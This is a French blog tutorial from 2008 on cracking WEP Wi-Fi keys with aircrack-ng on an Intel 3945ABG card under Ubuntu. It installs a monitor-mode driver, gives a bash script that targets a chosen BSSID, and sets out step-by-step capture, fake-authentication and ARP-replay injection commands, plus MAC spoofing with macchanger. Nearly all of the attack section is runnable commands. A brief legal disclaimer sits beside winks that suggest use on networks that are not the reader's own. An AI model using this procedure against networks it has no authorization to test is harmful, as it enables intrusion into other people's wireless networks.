mai
15
2008

Aircrack-NG avec une carte Wireless Intel 3945 ABG

closeCet article a été publié il y a 5 ans 11 mois 3 jours, il est donc possible qu’il ne soit plus à jour. Les informations proposées sont donc peut-être expirées.

Ce petit ‘tuto’ est plus un pense bête qu’un article, mais il est possible qu’il aide quelques personnes dans leur démarche de sécurisation de réseau Wifi (ou pas ?!)

Depuis quelques semaines j’ai un nouveau portable pour le taf, un Dell latitude D520, intégrant un chipset Intel, et ayant une carte wifi

  • $ lspci
  • c:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)
  • Il se trouve que sur d’autres distributions, les drivers intégrés au kernel étaient compatibles, mais sur la petite distribution Ubuntu 8.04, les drivers ne sont plus compatible pour accepter le “mode monitor”.

    Avant de commencer tout cela, un petit rappel des faits.

    AirCrack-NG

    Aircrack-ng est un groupe d’outils de monitoring pour réseau sans fil dont l’utilisation principale est le « cassage » de clés WEP et WPA-PSK.

    Aircrack fut développé sous licence GPL par Christophe Devine (consultant en sécurité informatique) puis repris par Thomas d’Otreppe sous le nom de Aircrack-ng.

    La version 0.9, comprend entre autres les outils suivants:

    • aircrack-ng: casseur de clés WEP statiques et WPA-PSK (Nouveau type de casseur: PTW)
    • airdecap-ng: décrypteur de fichiers WEP/WPA capturés
    • aireplay-ng: programme d’injection de paquets 802.11 (disponible sous Linux et FreeBSD seulement)
    • airodump-ng: programme de capture de paquets 802.11
    • airtun-ng: programme pour la création d’une interface virtuelle

    note: Ce logiciel est conçu pour tester la sécurité de son propre réseau, l’attaque d’un réseau extérieur sans l’accord de son propriétaire est passible de peines d’emprisonnement.

    Pré-requis

    * Vous possédez une machine linux avec Hardy Heron fraîchement installé, je n’ai ni le temps ni la volonté de tester sur un système amélioré
    * Vous avez réussi à compiler / installer les précédentes versions du pilote ipwraw (ceci je l’explique par la suite)
    * Vous savez comment utiliser Aircrack-ng (un minimum)
    * Vous possédez une clé WEP (Weak Encryption Protocol :D)
    * Vous pouvez utiliser le CLI (ahhhhhhhh, linux, votre CLI, un outil puissant et un mal de tête assuré pour les néophytes … CLI = Command Line Interface … La ligne de commande)
    * Les LETTRES MAJUSCULES dans la procédure de crackage de la clé WEP sont des paramètres FICTIFS pour
    - CHANNEL, le canal qui sera reniflé / injecté
    - FILE, un nom de fichier
    - ESSID, le nom du point d’accès tels que FREEPHONIE, LIVEBOX, …
    - BSSID, le point d’accès adresse
    - MACADDRESS, votre adresse mac de la carte wifi
    * Vous l’utilisez sous votre propre risque
    * Vous savez ce que le diable va faire

    Installation

    Rien de plus simple sous Ubuntu :

    sudo apt-get install aircrack-ng macchanger

    Configuration de la carte 3945 ABG (ipw3945 ou iwl3945)

    Il se trouve donc que les drivers fournis avec la distribution ne sont pas compatible pour que aircrack-ng fonctionne correctement, et puis scanner les réseaux Wifi. Il faut donc mettre en place des “drivers alternatifs”, que nous fournis gentillement le site de aircrack-ng :D

    Pré-requis

    sudo apt-get install linux-headers-`uname -r` build-essential libssl-dev macchanger

    Installation

    	
  • wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
  • tar -xjf ipwraw-ng*
  • cd ipwraw-ng
  • make
  • sudo make install
  • sudo make install_ucode
  • echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw
  • sudo depmod -ae
  • Maintenant, les drivers modifiés on été installés. Il faut donc décharger les drivers “officiels” pour charger ceux qui permettrons d’utiliser Aircrack-ng (les drivers iwpraw)

    Utiliser ipwraw

    • Décharger le module ipw3945 (ou iwl3945 sur ma machine)
    • Lancer ipwraw-ng

    Le périphérique créé sera automatiquement en mode Monitor.

    sudo modprobe -r ipw3945

    ou

    sudo modprobe -r iwl3945
    sudo modprobe ipwraw

    Le nouveau périphérique créé aura comme nom wifi0

    sckyzo@sckyzo:~$ iwconfig
    lo        no wireless extensions.
    eth0      no wireless extensions.
    wifi0     unassociated  ESSID:off/any
    Mode:Monitor  Channel=1  Bit Rate=54 Mb/s
    
    

    Voila, vous pouvez maintenant utiliser aircrack-ng pour sécuriser votre Wifi (ou pas ?!)

    Bien sur, après utilisation des drivers alternatifs avec aircrack, il vous faut recharger les modules ipw3945 ou iwl3945

    sudo modprobe -r ipwraw
    sudo modprobe iwl3945

    ou

    sudo modprobe ipw3945

    Maintenant, les drivers fonctionnent (enfin). Alors que faire maintenant ? Passons à l’action :
    Ouvrer un terminal, et copier ceci :

    #!/bin/bash
    	
  • clear
  • echo "Please provide the wifi0 CHANNEL"
  • read canal
  • echo "Please provide the capture rate (best results with only 2)"
  • read rate
  • echo "Please provide the target BSSID"
  • read bssid
  • ifconfig wifi0 down
  • chmod u+wrx /sys/class/net/wifi0/device/rate
  • echo $rate >/sys/class/net/wifi0/device/rate
  • echo $canal >/sys/class/net/wifi0/device/channel
  • echo $bssid >/sys/class/net/wifi0/device/bssid
  • ifconfig wifi0 up
  • echo "Configuration completed. Ready to do packet injection"
  • Enregistrez le document tel que : wepcrackconf.sh et attribuez les droits adéquates pour qu’il puisse être exécuté.

    sudo chmod +x wepcrackconf.sh

    Crackage

    Ouvrez 4 terminaux (oui c’est beaucoup, mais il les faut)

    Premier terminal

    sudo airodump-ng wifi0

    Second terminal

    sudo su
    ./wepcrackconf.sh
    • CHANNEL, choisissez le Canal de votre choix
    • rate toujours 2
    • BSSID, donné par le terminal précédent
    exit
    sudo airodump-ng -c CHANNEL -w FILE wifi0

    Troisième terminal

    sudo macchanger -s wifi0
    sudo aireplay-ng -1 10 -e "ESSID" -a BSSID -h MAC_ADRESSE wifi0

    Quatrième terminal

    aireplay-ng -3 -b BSSID -h MAC_ADRESSE wifi0

    De retour sur le premier terminal
    Après avoir récolté assez de IV, faites Ctrl+C pour stopper l’application

    aircrack-ng FILE.cap

    IMPORTANT :
    Recueillir au moins 500000 paquets, pour casser une WEP 64-bit Hex
    Vous pouvez changer l’adresse MAC il suffit de lire les infos ou macchanger page du manuel (man macchanger)

    Si toutefois vous avez des questions, n’hésitez pas.
    Je complèterai l’article au fur et à mesure de ma pensé

    Mise à jour : Aircrack-ng Configuration et mise en route
    - Utilisation de macchanger (apt-get)
    - Lancement de Aircrack et sa suite (airodump, airemachin ….)
    - Crackage clé WEP
    - Script
    Bien évidemment, je suis resté très simpliste sur les termes et les fonctions car je pars du principe que je m’adresse à des gens connaissant le domaine. Sinon, un lien (ci dessous) renvois sur un tuto assez complexe et instructif bien qu’un peu depassé (mais tant que ça fonctionne … hein ^^)

    Liens utiles :
    http://fr.wikipedia.org/wiki/Mode_moniteur
    http://fr.wikipedia.org/wiki/Aircrack
    http://www.aircrack-ng.org
    http://www.tuto-fr.com/tutoriaux/tutorial-crack-wep-aircrack.php

    Related Posts

    About the Author:

    Je m'appelle Thomas, j'ai 26 ans, je suis un passionné des nouvelles technologies. Je suis ingénieur sytème spécialisé dans l'Open Source. Webdesigner à mes heures perdues, développeur, geek invétéré, je tiens ce blog pour permettre à mes lecteurs de suivre l'actualité sur les Logiciels Libres. Je suis investis dans plusieurs projets libres tel que Planet-Libre.org et d'autres projets libres. N'hésitez pas a me contacter si vous souhaitez que j'écrive des articles sur des thèmes particuliers :-)

    Partenaires

    Articles Populaires

    Commentaires récents

    Recent Comments

    Powered by Disqus